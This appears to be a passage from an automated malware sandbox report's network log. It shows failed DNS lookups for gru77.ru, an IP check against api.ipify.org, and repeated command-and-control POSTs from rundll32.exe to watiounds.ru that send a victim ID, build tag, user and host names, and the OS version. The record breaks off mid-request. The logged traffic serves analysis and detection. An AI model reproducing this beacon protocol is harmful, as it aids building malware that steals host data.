                                          Apr 29, 2021 08:18:53.677119970 CEST8.8.8.8192.168.2.220x5490Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:54.685225964 CEST8.8.8.8192.168.2.220x5490Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:56.696758986 CEST8.8.8.8192.168.2.220x5490Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:00.010415077 CEST8.8.8.8192.168.2.220x2c87Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:01.016241074 CEST8.8.8.8192.168.2.220x2c87Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:02.031656981 CEST8.8.8.8192.168.2.220x2c87Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:04.045422077 CEST8.8.8.8192.168.2.220x2c87Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:07.866920948 CEST8.8.8.8192.168.2.220xfe80Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:08.880821943 CEST8.8.8.8192.168.2.220xfe80Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:09.894929886 CEST8.8.8.8192.168.2.220xfe80Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:11.906649113 CEST8.8.8.8192.168.2.220xfe80Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:15.231134892 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:16.244839907 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:16.368014097 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:19.270474911 CEST8.8.8.8192.168.2.220x2b1bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:23.069952011 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:24.075489998 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:25.088628054 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:27.101855040 CEST8.8.8.8192.168.2.220xd4abServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:29.530395031 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:31.423455000 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:32.437933922 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:34.449493885 CEST8.8.8.8192.168.2.220x5e91Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:37.384196997 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:38.397454977 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:39.411489010 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:41.424129009 CEST8.8.8.8192.168.2.220x2063Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:44.740514040 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:45.745582104 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:46.759238958 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:48.772165060 CEST8.8.8.8192.168.2.220x52f3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:52.672000885 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:53.670871973 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:54.685327053 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:56.697555065 CEST8.8.8.8192.168.2.220x8f38Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:00.022553921 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:01.034954071 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:02.049232960 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:04.061923981 CEST8.8.8.8192.168.2.220x427bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:07.875513077 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:08.882638931 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:09.897445917 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:11.909252882 CEST8.8.8.8192.168.2.220xbfaServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:15.234618902 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:16.246690035 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:17.260083914 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:19.273317099 CEST8.8.8.8192.168.2.220x3e7Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:23.057796955 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:24.062902927 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:25.076158047 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:27.088551998 CEST8.8.8.8192.168.2.220xf460Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:30.413861036 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:31.427534103 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:32.440834999 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:34.453134060 CEST8.8.8.8192.168.2.220x29b4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:38.280260086 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:39.292840004 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:40.306994915 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:42.320177078 CEST8.8.8.8192.168.2.220xaf1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:45.637773037 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:46.638206959 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:47.652447939 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:49.664099932 CEST8.8.8.8192.168.2.220x9014Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:53.471081018 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:54.485244036 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:54.612215042 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:57.512105942 CEST8.8.8.8192.168.2.220xb4e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:00.822374105 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:01.833441019 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:02.847553015 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:04.860924006 CEST8.8.8.8192.168.2.220xbf8bServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:08.680171013 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:09.680903912 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:09.806315899 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:12.707380056 CEST8.8.8.8192.168.2.220x3420Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:16.045171976 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:17.048170090 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:18.061734915 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:20.074213028 CEST8.8.8.8192.168.2.220x48d4Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:22.929033041 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:24.907818079 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:24.983545065 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:27.934767962 CEST8.8.8.8192.168.2.220x8d9fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:30.293646097 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:30.334377050 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:32.321976900 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:34.334450960 CEST8.8.8.8192.168.2.220x3ca1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • api.ipify.org
                                          • watiounds.ru

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.224916550.16.249.4280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:16:08.625492096 CEST1OUTGET / HTTP/1.1
                                          Accept: */*
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: api.ipify.org
                                          Cache-Control: no-cache
                                          Apr 29, 2021 08:16:08.774343014 CEST1INHTTP/1.1 200 OK
                                          Server: Cowboy
                                          Connection: keep-alive
                                          Content-Type: text/plain
                                          Vary: Origin
                                          Date: Thu, 29 Apr 2021 06:16:08 GMT
                                          Content-Length: 10
                                          Via: 1.1 vegur
                                          Data Raw: 38 34 2e 31 37 2e 35 32 2e 33
                                          Data Ascii: 84.17.52.3


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.224916695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:16:14.826397896 CEST2OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:16:14.968997002 CEST3INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:16:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 33 34 0d 0a 4d 4a 51 4e 41 52 68 41 45 67 34 4f 43 6b 42 56 56 52 30 49 44 30 31 4e 56 41 67 50 56 55 77 63 48 67 6b 64 54 6b 38 66 45 68 34 63 56 42 38 43 48 77 63 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 34MJQNARhAEg4OCkBVVR0ID01NVAgPVUwcHgkdTk8fEh4cVB8CHwc=0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          10192.168.2.224917595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:18:47.319185019 CEST29OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:47.441540003 CEST29INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVKPEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          100192.168.2.224926595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:09.532520056 CEST147OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:09.657797098 CEST147INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 51 4a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQQJJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          101192.168.2.224926695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:09.989902973 CEST148OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:10.122634888 CEST148INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          102192.168.2.224926795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:10.442804098 CEST149OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:10.569025993 CEST149INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          103192.168.2.224926895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:10.888163090 CEST150OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:11.011018991 CEST151INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBBYYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          104192.168.2.224926995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:11.333842039 CEST151OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:11.465650082 CEST152INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHKPSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          105192.168.2.224927095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:11.779228926 CEST152OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:11.902065992 CEST153INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          106192.168.2.224927195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:12.212189913 CEST154OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:12.333988905 CEST154INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNHSMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          107192.168.2.224927295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:12.650474072 CEST155OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
